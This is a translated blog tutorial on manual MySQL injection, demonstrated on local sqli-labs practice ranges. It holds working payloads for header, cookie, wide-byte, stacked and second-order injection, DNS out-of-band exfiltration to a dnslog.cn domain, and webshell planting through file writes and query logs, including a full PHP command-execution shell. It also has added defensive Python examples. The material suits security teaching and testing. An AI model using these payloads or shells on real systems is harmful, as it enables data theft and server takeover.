Network Security Advanced Learning Lesson 11 - MySQL Manual Injection (2)


1. UA injection

UA is the abbreviation of User-Agent (用户代理). It carries the client's operating system and version, CPU type, browser and version, browser rendering engine, browser language, browser plug-ins, and so on.

1. Principle

Some websites serve different pages to different operating systems and browsers by checking the UA, which is why some pages do not display properly in a certain browser. Where this is done, the UA header may be injectable. The UA is generally inserted into a table, so error-based injection (报错注入) can be used.

2. Shooting range demonstration:

1) When the page looks as follows, UA injection can be tried

The page identifies the browser version.

2) BP packet capture

Normal request

Adding a single quote to the UA causes an error.

3) Modify User-Agent

Constructed POC to get the database name:
1' and updatexml(1,concat(0x7e,database()),1) and '

Since we don't know how many parameters follow, the leading single quote closes the preceding one and the trailing single quote closes the following one. # cannot be used here to comment out the remaining parameters.

Subsequent extraction of other data is much the same as the union injection in the previous lesson.


2. Referer injection

1. Principle

In the request, the Referer is how your browser tells the server where you came from (来源). Most websites and apps write it to the database to analyze traffic sources and compute the cost of advertising. Since the data is generally inserted into a table, error-based injection (报错注入) can be used.

2. Shooting range demonstration:

This range logs the source address.

1) Use BP to capture packets

Normal request packet

Packet that triggers an error

2) Modify Referer

Constructed POC to get the database name:
' and updatexml(1,concat(0x7e,database()),1) and '

Since we don't know how many parameters follow, the leading single quote closes the preceding one and the trailing single quote closes the following one. # cannot be used here to comment out the remaining parameters.

Subsequent extraction of other data is much the same as the union injection in the previous lesson.


3. DNSLOG out-of-band extraction

1. Usage scenarios

Usually, when there is no echo during SQL injection testing, we can only determine whether injection exists through blind injection, and blind injection tested by hand takes a lot of time. You may think of running the data directly with sqlmap, but in real tests running blind injection with sqlmap has a high chance of getting the IP banned by the site, which affects test progress. A proxy pool is another option.

After we enter a domain name, the local DNS server first checks whether it already has the IP address. If not, it asks the root name server; if the root has a matching record it returns it, otherwise it tells the local name server to go and ask the top-level domain name server.

2. DNS

DNS leaves records when it resolves names.
Simply put, when the DNS server is our own, we can obtain information by looking at its logs.

3. Conditions required for the injection

  • 1. DNS out-of-band queries apply to MySQL injection, and MySQL has a system variable secure_file_priv whose value must be empty (nothing after the equal sign).

  • 2. The LOAD_FILE() function is used: LOAD_FILE() reads a file and returns its contents as a string.
    The syntax is load_file(file_name), where file_name is the full path of the file.

  • 3. Therefore root privileges are needed, and the server must be running Windows, since the path handed to load_file() is a Windows UNC path (\\host\share).

4. How to use

Place a payload containing a unique field from the DNSlog platform into the target so that it triggers a DNS request. During resolution, the key data is joined into a new subdomain and carried out, and it shows up in the DNS log of the NS server.

5. Shooting range demonstration:

1) Generate a DNS domain name

First, generate a random domain name on the DNSlog platform:
29lrdw.dnslog.cn

Ping a random subdomain of that domain locally:

The asd I typed at random was successfully carried out.

2) Set the secure_file_priv attribute in MySQL

Then restart MySQL.

3) Use BP to operate

Use an injection statement to obtain the database name. POC used:
http://192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+database()),'.29lrdw.dnslog.cn/qwe')))--+

Return to the DNSLOG page to view the database name.

Get the current username, using the POC:
http://192.168.50.137:9006/Less-1/?id=1'+and+(select+load_file(concat('\\\\',(select+hex(user())),'.29lrdw.dnslog.cn/qwe')))--+

Return to the DNSLOG page to view.

Decode the hex.

In this way, the current user name is successfully obtained.

4) Why do you need to hex encode the query content?

If the username we query contains special characters such as !@#$%^&, the request sent to the DNS server becomes !@#$%^&*.29lrdw.dnslog.cn, and a domain name containing special characters cannot be resolved (存在特殊字符的域名无法解析). The queried data therefore never appears in the DNS log, so the query has to be encoded first. For example, the username above is root@localhost, which contains the special character @; the DNS server cannot resolve that, so hex encoding is needed (需要hex编码): query the hex result and then decode it.

When we are not sure whether the query result contains special characters, it is best to hex encode it before carrying it out.
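From the defender's side, the same pattern is visible in resolver logs. As an added example (not from the original lesson), the Python below inspects DNS query names for lookups under an attacker-controlled zone and decodes leftmost labels that are hex, the way hex(user()) travels above; the zone 29lrdw.dnslog.cn is the page's, while the client addresses and query names are constructed.

```python
# Added example (not from the original lesson): inspect DNS query names seen
# by a resolver or IDS for the out-of-band pattern above, where database values
# travel as the leftmost label of a lookup under an attacker-controlled zone.
# The client addresses and sample queries are constructed.
import re
from collections import defaultdict

HEX_LABEL = re.compile(r"^(?:[0-9a-f]{2})+$", re.I)


def split_query(name: str, zone: str):
    """Return the labels in front of `zone`, or None if the name is not under it."""
    name = name.rstrip(".").lower()
    zone = zone.rstrip(".").lower()
    if name == zone or not name.endswith("." + zone):
        return None
    return name[: -len(zone) - 1].split(".")


def decode_label(label: str) -> str:
    """Decode a hex label (as produced by hex(user())) to text; otherwise return it."""
    if HEX_LABEL.match(label):
        try:
            return bytes.fromhex(label).decode("utf-8")
        except UnicodeDecodeError:
            pass
    return label


def analyze(queries, zone):
    """Group by querying client; return {client: [decoded leftmost labels]}."""
    exfil = defaultdict(list)
    for client, qname in queries:
        labels = split_query(qname, zone)
        if not labels:
            continue
        # the leftmost label carries the data; anything after it is noise
        exfil[client].append(decode_label(labels[0]))
    return dict(exfil)


# Constructed (client, queried name) pairs modelled on the lesson's lookups.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.example.test."),
    ("10.0.0.5", "testdb.29lrdw.dnslog.cn."),                          # database()
    ("10.0.0.5", "726f6f74406c6f63616c686f7374.29lrdw.dnslog.cn."),    # hex(user())
    ("10.0.0.9", "asd.29lrdw.dnslog.cn."),                             # manual ping
]

if __name__ == "__main__":
    for client, labels in analyze(SAMPLE_QUERIES, "29lrdw.dnslog.cn").items():
        print(client, "->", labels)
```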


4. Cookie injection

1. Principle of injection

The parameters passed via GET are filtered, but parameters can also be passed through cookies, which are overlooked.
Cookie injection works the same way as ordinary injection, except that the parameters are submitted in the cookie, whereas ordinary injection submits them via GET or POST.
(GET appends the statement to be injected directly to the URL; POST submits it through a form. The difference is that with GET we can see the submitted parameters in the browser address bar, and with POST we cannot.)

Cookie injection: modify your own cookie. After the backend reads the cookie it compares it directly against the database, and injection can occur during that comparison.
Note: this injection can generally be combined with an XSS attack.

2. Shooting range demonstration:

1) The following situation, seen in a BP packet capture, has cookie injection

2) Find the injection point and use single quotes to test

When adding a single quote after admin in the cookie causes an error, injection exists here.

3) Construct POC injection

Cookie: uname=admin ' and updatexml(1,concat(0x7e,database()),1) #
Note that the above POC uses # to ignore the following content rather than --.


5. Wide byte injection

1. Injection principle

When the database uses GBK encoding (使用GBK编码), two bytes are merged into one Chinese character. Special characters such as the single quote are escaped, for example: ' -> \' (%27 -> %5c%27).
We can therefore put a GBK lead byte such as %df in front of the single quote ('). This byte swallows the backslash (\) and frees the following single quote. %df%27 is escaped to %df%5c%27; under GBK, %df%5c merges into one Chinese character and the remaining %27 (') is left on its own, unescaped.

2. Shooting range demonstration:

1) Wide byte injection exists in the following situation

Adding a ' automatically adds a \ in front of it: escaping is used for filtering.

2) Construct POC injection

http://192.168.43.110:9006/Less-32/?id=-1%df%27 union select 1,database(),user()--+

In this way, the database name and user name are obtained.

Note: it is assumed here that the table is already known to have three columns; the preceding steps are the same as for union injection.
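As an added example (not from the original lesson), the Python below reproduces at byte level why a byte-oriented backslash escape fails on the %df%27 input above, and shows the charset-aware handling that closes the gap: decode in the connection charset before escaping, and reject input that is not valid in it. The addslashes-style helper and the inputs are constructed; in a real PHP/MySQL stack the equivalent is setting the connection charset with mysqli_set_charset() so that mysqli_real_escape_string() sees the same charset, or using prepared statements.

```python
# Added example (not from the original lesson): shows at byte level why a
# charset-unaware backslash escape fails under GBK, and the charset-aware
# alternative. Helper names and inputs are constructed for this illustration.
from urllib.parse import unquote_to_bytes


def addslashes_bytes(raw: bytes) -> bytes:
    """Byte-oriented escaping in the style of addslashes(): a backslash goes
    before every ' " and \ without any knowledge of the charset."""
    out = bytearray()
    for b in raw:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_survives(escaped: bytes, charset: str) -> bool:
    """True if, once the server decodes the escaped bytes in `charset`,
    a bare single quote is still present (the escape byte was swallowed)."""
    text = escaped.decode(charset, errors="replace")
    return "\\'" not in text and "'" in text


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Decode first, so an orphan lead byte can never pair with the backslash.
    Input that is not valid in the charset raises instead of being guessed."""
    text = raw.decode(charset)  # raises UnicodeDecodeError on an invalid sequence
    text = text.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    return text.encode(charset)


# Constructed inputs: the id parameter from the lesson, URL-decoded to bytes.
WIDE_BYTE_INPUT = unquote_to_bytes("-1%df%27")   # b"-1\xdf'"
PLAIN_INPUT = b"-1'"

if __name__ == "__main__":
    esc = addslashes_bytes(WIDE_BYTE_INPUT)
    print(esc.hex(), "->", esc.decode("gbk", errors="replace"))
    print("quote freed under gbk  :", quote_survives(esc, "gbk"))
    print("quote freed under utf-8:", quote_survives(addslashes_bytes(PLAIN_INPUT), "utf-8"))
    try:
        charset_aware_escape(WIDE_BYTE_INPUT, "gbk")
    except UnicodeDecodeError as e:
        print("charset-aware path rejects the input:", e.reason)
```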


6. Stack injection

1. Injection principle

In SQL, the semicolon (;) marks the end of a statement. Imagine that after ending one SQL statement with ; we keep constructing the next one: will both execute together? That is the idea behind stacked injection.

2. The difference between union injection and stacked injection

The difference is that the statement types union or union all can execute are limited: union injection is used to execute query statements, whereas stacked injection can execute arbitrary statements.

3. Shooting range simulation:

Construct the POC as follows:
http://192.168.43.110:9006/Less-38/?id=1'; insert into users(id,username,password) values(100,'kkkddd','kkkddd')--+

Then return to the range and view the database.
In this way, the MySQL statement that creates the user was successfully injected.


7. Second-order injection

1. Injection principle

The input is converted to a string and stored in the database, so it cannot execute directly. We can therefore first store the POC in the database (先把POC存储进数据库), then have the stored POC read back out and executed, achieving the injection.

Normally account names do not allow special symbols such as # @ \ ', but it is worth trying; if they are accepted, a second-order injection can be attempted.

2. Usage scenarios

I know that an account name exists and want to change the password of that account. For example, I know there is an account called admin; I create an account called admin'# and then change the password of the admin'# account, which changes the password of admin.

3. Shooting range example:

1) There is a secondary injection in the following example

The admin account is used here.

Logging in normally, the length of the returned packet is 265.

No matter whether I add a single quote, two single quotes or other characters after login_user above, an error occurs, which means all input is converted to string form for storage and query.

2) Create a new account

New account name: admin'#
New account password: 123456
Login successful.

3) Change the password of the new account

Account name: admin'#
New account password: 111111

4) Log out and log in again to view the results

I tried to log in to the admin'# account and found that the newly changed password 111111 did not work; I still had to use the old password 123456.

I tried to log in to the admin account and found that the original password admin no longer worked; the password had changed to 111111.

5) Statement explanation:

The following SQL statement is used here:
UPDATE users SET PASSWORD='111111' where username='admin'#' and password='123456';

It is not hard to see that everything after # is ignored when this is executed, so it becomes:
UPDATE users SET PASSWORD='111111' where username='admin'

What was meant to modify the admin'# account has become a modification of the admin account.


8. GETSHELL

1. Conditions for using SQL injection to obtain MYSQL database permissions

  • 1) root, the highest privilege
  • 2) The absolute path of the website is known
  • 3) secure_file_priv= is empty or points to the website root directory

2. Principle of file read and write injection

It uses the file read and write permissions for injection: a one-sentence webshell can be written, and sensitive system files can be read.

3. Conditions for file read and write injection

Newer versions of MySQL added the secure_file_priv feature, which restricts where mysql can read and export files.

4. secure_file_priv option

  • 1) secure_file_priv=
    means there is no restriction on reading and writing files

  • 2) secure_file_priv=NULL
    means file reading and writing is not permitted

  • 3) secure_file_priv=d:/phpstudy/mysql/data
    means files can only be read and written under that path.

Command:
show global variables like '%secure%'
# view the configuration of mysql global variables

5. Absolute paths of common websites

  • 1) Common paths on Windows

  • 2) Common paths on Linux

6. Common ways to obtain paths

Error display, legacy files, vulnerability error reports, platform configuration files, etc.

7. Read files

1) Functions used

Files are read with load_file().

2) Notes on the path

The path cannot use a backslash (反斜杠, \). A slash (斜杠, /), a double backslash (双反斜杠, \\), 0x hex or char() conversion can be used instead.

3) Generally used together with union injection

4) Shooting range demonstration

  • 4.1. Create a file on the target machine.
    Create a file named 1.txt in the C:\phpstudy_pro\WWW\sqli-labs-master directory with the content: i am 1.txt

  • 4.2. Construct a POC to read the file.
    Use SQL injection to read the file on the range. The POC is:
    http://192.168.1.104:9006/Less-2/?id=-1 union select 1, load_file('C:/phpstudy_pro/WWW/sqli-labs-master/1.txt'),3--+

In the same way, this method can read any file. In general practice, we can use this method to read the website's configuration files and log files.

Note: the path above cannot use a backslash (\); only a slash (/) or a double backslash (\\) can be used.

8. Write files

1) Functions used

Use into outfile (can write multiple lines, formatted output) or into dumpfile (writes only one line, with no dirty data).

2) Points to note about the outfile function

The path after outfile cannot be given as 0x hex or as a char() conversion; it must be a single-quoted path (只能是单引号路径).

3) Shooting range demonstration:

3.1. Construct POC to write file

Now we need to create a file 3.txt in the C:\phpstudy_pro\WWW\sqli-labs-master directory and write content into it. The POC is:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1,'helloword',3 into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/3.txt'--+

Now go to the directory that was written to and view the content of the query.

Note: if the file name to be written already exists, the write fails.

3.2. Try to write to shell

Constructed POC:
http://192.168.1.104:9006/Less-2/?id=-1 union select 1, '<?php%20@eval($_POST[\'x\']);?>',3into outfile 'C:/phpstudy_pro/WWW/sqli-labs-master/4.php'--+

Try to connect with a shell management tool: connection successful.

Return and view the written file.

3.3. The difference between into outfile and into Dumpfile

  • into outfile: however it is written, there will be dirty data such as spaces.
  • into dumpfile: dirty data such as spaces is removed automatically.

For example, in the case above, if you want only the pure PHP text and no other dirty text, use into dumpfile and replace the 1 and 3 columns with '' (two single quotes, an empty string).


9. Log GETSHELL

1. Prerequisites:

  • 1. The website's absolute path (绝对路径) is known
  • 2. The website has stacked injection (堆叠注入)
  • 3. root privileges (root权限) are held

2. Specific steps:

  • 1. Query the log path: show variables like '%general%';
  • 2. Turn on the log: set global general_log = on; (it is off by default)
  • 3. Set the log path: set global general_log_file = 'D:\phpstudy_pro\WWW\shell.php';
  • 4. Write the shell into the log through a request, then connect to the shell with a tool.

3. Shooting range demonstration (stacked injection is known to exist):

1) First check whether the shooting range has enabled logs:

show variables like '%general%';
This is turned off by default.

2) Use stack injection to enable logs

set global general_log = on;

Return to the range to see whether it is turned on: it shows that it is.

3) Use stack injection to modify the path of the log

set global general_log_file = 'D:\phpstudy_pro\WWW\shell.php';

Return to the range to check: the log path has clearly been changed.

4) Put a shell in the URL so that it is recorded in the log

Return and view the log.
In this way, the shell has been written into the log.


10. --os-shell (sqlmap)

1. Principle

--os-shell uses UDF privilege escalation to obtain a WebShell. It also writes two files to the server via into outfile: one that executes system commands directly (直接执行系统命令) and one that uploads files (上传文件).

This is a sqlmap option.

2. Prerequisites for using the --os-shell option

  • 1. The user must be DBA; check with --is-dba (phpstudy installations are usually DBA)
  • 2. secure_file_priv has no specific value
  • 3. The absolute path of the website is known
  • 4. GPC is off, and PHP's automatic escaping is turned off

3. Shooting range demonstration:

sqlmap -u http://192.168.43.145/2_Shotting_Range/sql/Less-1/?id=1 --os-shell

sqlmap generates two files in the specified directory (the file names are random, not fixed). The two files generated here are:

  • tmpbeewq.php, used to execute system commands
  • tmpuqvgw.php, used to upload files

3.1. The file used to execute system commands

The content of tmpbeewq.php is:

    <?php
    $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set("max_execution_time",0);
    $z=@ini_get("disable_functions");
    if(!empty($z)){$z=preg_replace("/[, ]+/",',',$z);$z=explode(',',$z);$z=array_map("trim",$z);}else{$z=array();}
    $c=$c." 2>&1\n";
    function f($n){global $z;return is_callable($n)and!in_array($n,$z);}
    if(f("system")){ob_start();system($c);$w=ob_get_clean();}
    elseif(f("proc_open")){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}
    elseif(f("shell_exec")){$w=shell_exec($c);}
    elseif(f("passthru")){ob_start();passthru($c);$w=ob_get_clean();}
    elseif(f("popen")){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}
    elseif(f("exec")){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}
    else{$w=0;}
    echo"<pre>$w</pre>";
    ?>

Try executing a system command:

3.2. The file used to upload files

Use tmpuqvgw.php to upload files.

Let's upload a PHP one-sentence backdoor.


Origin blog.csdn.net/p36273/article/details/132058773